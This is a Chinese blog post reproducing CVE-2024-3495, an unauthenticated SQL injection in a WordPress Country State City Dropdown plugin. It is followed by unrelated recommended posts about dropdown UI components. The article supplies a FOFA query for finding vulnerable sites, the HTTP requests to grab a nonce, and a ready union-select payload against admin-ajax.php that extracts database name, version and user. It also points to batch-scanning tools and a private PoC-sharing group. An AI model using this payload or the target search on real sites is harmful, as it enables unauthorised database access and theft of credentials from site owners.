【漏洞复现】WordPress Country State City Dropdown CF7插件 SQL注入漏洞(CVE-2024-3495)

已于 2024-05-27 11:28:00 修改
阅读量551 收藏 2
点赞数 6
分类专栏: 漏洞复现篇 文章标签: sql
于 2024-05-27 11:26:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/139233397
版权

0x01 产品简介

Country State City Dropdown CF7插件是一个功能强大、易于使用的 WordPress 插件,它为用户在联系表单中提供国家.州/省和城市的三级下拉菜单功能,帮助用户更准确地填写地区信息。同时,插件的团队和支持也非常出色,为用户提供高质量的服务,

0x02 漏洞概述

由于WordPress的County State City Dropdown CF7插件在2.7.2及以下的版本中存在SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞获取数据库敏感信息,导致凭证密钥等信息泄露,深入利用还可能会对服务器造成严重威胁。

0x03 影响范围

Country State City Dropdown CF7 <= 2.7.2

0x04 搜索语法

FOFA:body="/wp-content/plugins/country-state-city-auto-dropdown/"

在这里插入图片描述

0x05 漏洞复现

1、访问首页获取nonce的值

GET / HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

在这里插入图片描述
2、携带 nonce的值进行注入

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
 
action=tc_csca_get_states&nonce_ajax=2c72d99abc&cnt=1+or+0+union+select+concat%280x64617461626173653a%2Cdatabase%28%29%2C0x7c76657273696f6e3a%2Cversion%28%29%2C0x7c757365723a%2Cuser%28%29%29%2C2%2C3--+-

查询数据库名称+数据库版本+当前用户
在这里插入图片描述

0x06 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC获取

请使用VX扫一扫加入内部POC分享圈子
在这里插入图片描述

SuperherRo
关注
  • 6
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
WordPress Country State City Dropdown CF7插件 SQL注入漏洞复现CVE-2024-3495
0xSec
05-25 683
由于WordPressCountry State City Dropdown CF7插件在2.7.2及以下的版本中存在SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞获取数据库敏感信息,导致凭证密钥等信息泄露,深入利用还可能会对服务器造成严重威胁。
使用VUE下拉框组件el-dropdown-item,设置click点击事件,会触发两次
qq_42955997的博客
04-07 7311
项目场景: 毕设项目 问题描述 问题帖链接:https://ask.csdn.net/questions/7683469?answer=53747393&username=qq_42955997 原因分析: 使用的组件是elementplus的el-dropdown下拉框组件,官方并没有提供@click的方法,所以可能出现一些未知的问题。 解决方案: 这里官方提供了一个方法叫commond,官方说明是“点击菜单项触发的事件回调”,这正是我们需要的。解决方式参考帖子:https://blog.csdn
bootstrap中将菜单改为鼠标滑过(bootstrap-dropdown-hover插件
热门推荐
故梦-阿梓
03-30 1万+
出处:https://www.cnblogs.com/EnderH/archive/2016/04/09/5371712.htmlgithub:bootstrap-dropdown-hover点击下载bootstrap的下拉组件,需要点击click时,方可展示下拉列表。因此对于喜欢简单少操作的大家来说,点击一下多少带来不便,因此,引入hover监听,鼠标经过自动展示下拉框。其实在bootstrap...
angularjs-dropdown-multiselect使用
XuJiangDong
01-16 3115
介绍一个非常好用下拉列表插件 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20190116200026652.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1amlhbmdkb25nMTk5Mg==...
element-ui_dropdown-下拉菜单
gaogzhen的博客
08-11 1万+
element-ui_dropdown-下拉菜单 目录 文章目录1、效果展示2、下拉菜单相关组件2.1、el-dropdown 下拉菜单2.2、el-dropdown-menu 下拉列表3.3、el-dropdown-item 下拉菜单项3、头像组件_el-avatar4、实现***后记*** : 内容 1、效果展示 应用场景:登录后用户展示 折叠效果图示0-1: 鼠标悬停效果图示0-2: 2、下拉菜单相关组件 2.1、el-dropdown 下拉菜单 常用属性: 属性
element ui中的el-dropdown(下拉框)防止点一下就隐藏的问题
yb305
04-09 6383
element ui中的el-dropdown(下拉框)防止点一下就影藏的问题 当使用el-dropdown下拉框时,下拉框的每项中,可能需要加入@click、@change或复选框等事件,而el-dropdown-item的事件触发时,el-dropdown下拉框总是会收缩,很不合理。 将hide-on-click属性默认为false可以关闭此功能 ...
html input dropdown,选择下拉插件-Dropdown.js
weixin_39676348的博客
06-17 4044
简介Dropdown是面向PC端的基于jQuery开发的轻量级下拉框插件,支持key/value搜索,有token和select两种模式。兼容Internet Explorer 8+Chrome for PCSafari for PCFirefox for PC在线演示及下载功能支持 select 和 token 两种模式支持 optgroup 分组保留原生 select 的键盘操作数据源可以直接...
el-dropdown 的事件绑定
miya的博客
01-22 4405
&lt;el-dropdown class="filter-select" @command="handleCompanyChange" trigger="click"&gt; &lt;span class="el-dropdown-link font-bold"&gt; {{company}}&lt;i class="el-icon-car
Element-UI 给el-dropdown添加滚动条
ddk54321的博客
04-08 9141
Element-UI 官方文档中没有给出下拉菜单(el-dropdown)设置滚动条的方法。 但是又没有试验出为下拉菜单添加el-scrollbar的使用方法。 所以直接修改的自带的滚动条样式。 下拉菜单el-dropdwn的HTML代码: <!-- 未归档项目下拉框 --> <el-dropdown class="project-container" @comm...
Magento2-City-Dropdown:Magento 2扩展程序的City Dropdown
05-11
Magento 2城市下拉菜单 Magento 2的城市下拉列表的创建是为了允许用户/商人在结帐过程中将城市和地区/州/省作为下拉列表包括在内,但是最近在保存新地址时,也可以在此处找到该选项。 使用此工具,您可以导入每个...
ng-multiselect-dropdown:多选下拉组件
01-30
入门产品特点具有单/多选择选项的下拉菜单绑定到任何自定义数据源搜索带有自定义占位符文本的项目极限选择选择/取消选择所有项目自定义主题安装npm install ng-multiselect-dropdown然后将其包含在您的模块中(请...
vant 自定义 van-dropdown-item的用法
10-15
主要介绍了vant 自定义 van-dropdown-item的用法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
react-dropdown-select:可自定义的下拉菜单用于做出React
04-28
例如在document.body 自动位置小捆安装npm install --save react-dropdown-select网站动机react-select非常好,但是有时项目要求超出了它的能力范围用法进口: import Select from "react-dropdown-select";...
解决vue使用vant下拉框van-dropdown-item 绑定title值不变问题
10-15
主要介绍了解决vue使用vant下拉框van-dropdown-item 绑定title值不变问题,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
jmeter性能优化之mysql监控sql慢查询语句分析
回家吃月饼的学习交流地
06-09 877
jmeter性能之sql慢查询语句分析
mybatis LambdaQueryWrapper之复杂与或非sql逻辑编写
最新发布
乐点的博客
06-13 190
其中wrapperNew包括queryWrapper1 || queryWrapper2 || queryWrapper3。上述sql逻辑解读为:wrapper集合 && (wrapperNew);
PostgreSQL的视图pg_roles
lee_vincent1的博客
06-10 702
pg_roles是 PostgreSQL 中的一个系统视图,提供了关于数据库角色(用户和组)的信息。PostgreSQL 中的角色用于管理数据库的权限、登录能力以及其他安全相关的特性。通过查询pg_roles视图,数据库管理员可以了解和管理数据库中所有角色的详细信息。pg_roles。
JavaSpringboot+vur前后端分离党员信息管理系统(源码+sql+论文)
u014445459的博客
06-11 793
简化系统开发和维护。它做的事情越多,就封装了常见的JavaScript功能和代码,并提供了一个简单的JavaScript设计相关的模式,用于优化HTML文档操作、事件处理、CSS样式化、动画设计和Ajax请求交互。在互联网技术高速发展的今天,通过互联网的传播会让企业更容易的创造更多的经济效益,利用互联网的传播党建信息管理、通过网页版党建信息管理平台的实现 ,让更多人了解到党建新闻、组织风采等相关信息、得到了更大的宣传,在这样一个大环境下把资源统筹规化起来,就会获得高效的党建党员信息和推广。
el-dropdown
06-02
`el-dropdown` 是基于 Element UI 框架实现的下拉菜单组件,以下是一个简单的示例: ```html <el-dropdown> <span class="el-dropdown-link"> 下拉菜单<i class="el-icon-arrow-down el-icon--right"></i> </span> <el-dropdown-menu slot="dropdown"> <el-dropdown-item>选项1</el-dropdown-item> <el-dropdown-item>选项2</el-dropdown-item> <el-dropdown-item>选项3</el-dropdown-item> </el-dropdown-menu> </el-dropdown> ``` 其中,`el-dropdown` 是下拉菜单的容器,`el-dropdown-link` 是触发下拉菜单的元素,`el-dropdown-menu` 是下拉菜单面板,`slot="dropdown"` 表示将 `el-dropdown-menu` 插入到 `el-dropdown` 中。 需要注意的是,以上代码需要引入 Element UI 的样式文件和 JavaScript 文件,并且需要在 Vue 实例中注册 `el-dropdown`、`el-dropdown-menu` 和 `el-dropdown-item` 组件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值